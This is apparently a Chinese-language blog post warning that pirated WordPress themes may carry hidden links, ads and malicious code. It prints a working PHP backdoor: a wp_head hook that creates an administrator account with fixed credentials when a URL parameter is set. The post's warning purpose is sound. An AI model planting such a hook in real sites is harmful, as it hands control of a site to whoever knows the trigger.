WordPress 除了大量官方的主題,還有為數眾多的主題設計者發佈免費和收費主題,很多童鞋經常到處收集主題拿回來測試使用,其中一些無良者將收集到 的國外商業收費主題進行漢化修改,添加暗鏈、廣告,甚至惡意代碼,然後免費或者收費公開發布出去,誘使別人下載使用,達到不可告人的目的。另外,這些商業 收費主題一般都是測試版本,主題代碼不完善、功能缺失,個別測試版的商業主題啓用後會自動向數據庫中寫入大量數據.......
下面的代碼更加邪惡,可以自動添加一個角色為管理員的用户。
- add_action('wp_head', 'holeinthewall');
- function holeinthewall() {
- If ($_GET['backdoor'] == 'go') {
- require('wp-includes/registration.php');
- If (!username_exists('username')) {
- $user_id = wp_create_user('username', 'password');
- $user = new WP_User($user_id);
- $user->set_role('administrator');
- }
- }
- }
將代碼添加到您當前主題的 functions.php 文件或插件中,會自動創建一個用户名:username 密碼:password 的有管理員權限的用户,之後想做什麼都可以了。
所以,這裏奉勸大家還是不要在自己的站點上使用盜版主題和插件,儘量到官方或原始發佈站點下載主題,以免被開了後門也不知曉!